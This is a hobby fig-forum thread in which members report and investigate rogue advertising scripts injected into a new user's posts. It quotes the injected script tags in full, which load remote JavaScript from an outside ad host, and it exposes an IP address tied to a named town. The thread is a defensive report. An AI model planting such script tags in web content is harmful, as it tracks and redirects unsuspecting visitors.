Sorry for not emailing, no access to my email right this sec to report this properly.

There is a new user signed up two days ago under the name "egptcountryboy"

Every post this use is making is embedded with a script that hyperlinks items on the page.  If you look at source of his posts, you will find the following, which forced loading of a Javascript script for an advertising company:

<
scripttype="text/javascript"src="http://loading-resource.com/50.js.php?i=%7B40E1C7C6-37A4-4F48-9508-E7411BB63C75%7D"></script><scripttype="text/javascript"src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&amp;pid=1032&amp;zoneid=10368&amp;cid=US&amp;rid=MD&amp;ccid=Crownsville&amp;ip=68.55.64.120"></script>

http://figs4funforum.websitetoolbox.com/post/show_single_post?pid=1274342761&postcount=1

Hope you're able to do something.

Jasson
What caution do you suggest for those who have not yet opened his posts.

There is a script file being posted in the posts, and it's referencing an IP address of a computer using Comcast cable in Crownsville, Maryland.  Looks to be an advertising script.  Very curious.  Submitting the source on the Javascript to a couple of security vendors to inspect.

My advice is ... don't click on the links inside his posts or any other subsequent members posts on that page, simply put.

And for the new forum user above (Abraham/egptcountryboy), I'd recommend you go download a tool like MalwareBytes and perform a full scan on your system if you have no idea what I'm talking about.

NOTE:  NOBODY ELSE NEEDS TO SCAN THEIR SYSTEM.

Thanks Jason.
Now we can overcome the curiosity....

I'm checking on it. The poster seems legit. I deleted everything in the post, and replaced it with a clean text file, but the link returns. Same issue shows up in post by BLB, who we know is legit.

Still waiting on the script file to be dissected.  Will let you know what I find out.  It is true that there are links on two posts, but technically, any script will load once and affect everything on the page.

(I need to look at the source - it may be embedded in the user signature - can you check?

What??? What is showing up in my posts?? I have a Macafee system to prevent any stuff like this what do I do?

I am running Malwarebytes, the program Jason recommended. 

Blb legit? Lol sure. 

Barry is a SPY>>>>>>in the famous words of Charlie Brown AAGGGHHHHHHH...

I'm spying on the fig people so I can report back to the pomegranate people.
Seriously though, I am running the malware thing recommended by Jason, it's found nothing in nearly 2 hours but is still going. Anything I've posted on this forum was a picture taken from my cell phone. I don't know how these Malware or virus things work, not one clue, but I don't want to cause any problems for my friends or myself.   

The scan just completed, no malitious malware detected.
 

Yes, there is no malware, I'm talking about a tracking script which is embedded in every post that user makes.  It hyperlinks here:

http://loading-resource.com/50.js.php?i=%7B40E1C7C6-37A4-4F48-9508-E7411BB63C75%7D

I downloaded the program you suggested, ran a full scan and it found nothing. I have Macafee and it updates automatically and again nothing.  

Frankly, that sounds like an issue with some kind of tracking cookie?  Spybot, or some other anti-advertising program might be more of use.

Malware Bytes is such a program; Spybot S&D and MalwareBytes are both competent programs, both with their own perks.  MalwareBytes tends to do better with browser hijackers after an infection happens, Spybot S&D is better to prevent browser hijackers.

Confused why folks are scanning their computers?  There is no need, folks.  This has nothing to do with your system.  It appears either the user (egptcountryboy) is manually embedding tracking scripts into his posts, or he's infected with (and/or has installed) something that is automatically dropping this hidden scripting into his posts.

Just want to show what is going on.

This is the source code behind his first post (see attached image).

The portion of source code I highlighted between his name "-Abe" and his actual signature (everything after below the ---------------) is the offending script call that appears to be causing the underlined links in everyone's posts.  After picking apart the linked script (*.js) that's linked between the end of his post content and his signature, it appears it's using Macromedia Flash to show the popups when you hover over the links.  If you run your browser with Flash plugin off, it stops. 

The script calls only exist in his posts, nobody elses.
The underlined links only show up in threads he has posted in, as a result of the script calls.
The scripts being called affect all posts inside a thread, not just his.
All of the script calls redirect people to an external search engine.

Reaks of advertising bot/rogue advertising.

 

Ok I responded to his post. So perhaps because of that it showed up as it sounds like you're saying it showed up in the whole thread. Anyway, Jon said something was showing up on my posts. Jason suggested Malwarebytes to the other guy, but I'm thinking I have a problem so I downloaded that and ran it. It found nothing. Just to set the record straight. 

Gonna keep my eye on you Barry, lol.

Jason, I noticed a link I am sure Herman2 did not choose to include in this thread. http://figs4funforum.websitetoolbox.com/post/Maltese-Falcon-5938125.

Edit: Nevermind, I read that you figured this one out already. Funny it only links the word Ischia.